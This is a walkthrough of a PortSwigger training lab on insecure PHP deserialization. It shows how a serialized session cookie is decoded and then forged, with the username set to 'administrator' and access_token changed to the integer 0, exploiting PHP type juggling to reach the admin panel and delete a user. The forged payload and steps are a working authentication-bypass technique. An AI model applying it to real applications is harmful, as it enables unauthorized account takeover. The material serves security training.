PortSwigger Lab: Modifying serialized data types | WalkThrough
Introduction
Today in this post I am going to share my Walkthrough for PortSwigger Lab(Modifying serialized data types). The cookie used for creating session is php serialized . To become admin we are going to change the data type of access_token . PHP will effectively convert the entire string to an integer value based on the initial number. This will help us become admin and solve the lab.
Objective
This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.
You can log in to your own account using the following credentials: wiener:peter
Detection
Login with the given credentials wiener:peter .
We can see our session has been created.
After decoding the cookie we can see php serialization . I have created php code which deserialize the cookie .
<?php$strng='O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"a7e4j477ehhln5monacatdqudq8wvp7e";}';$uns = unserialize($strng);
var_dump($uns);?>
Exploitation
This works for any alphanumeric string that starts with a number. In this case, PHP will effectively convert the entire string to an integer value based on the initial number. The rest of the string is ignored completely. Therefore, 5 == "5 of something" is in practice treated as 5 == 5.
so we will change the username to administrator and access_token to an integer .
<?php$strng='O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}';$uns = unserialize($strng);
//var_dump($uns["access_token"]);
var_dump($uns);?>
s:13 means a string of 13 char i.e administrator.
and i:0 means an integer i.e 0 here.
To learn more about php deseralization read this .
Encode the payload and paste it in session and go to /admin press Enter.
Now delete user carlos and solve this lab.
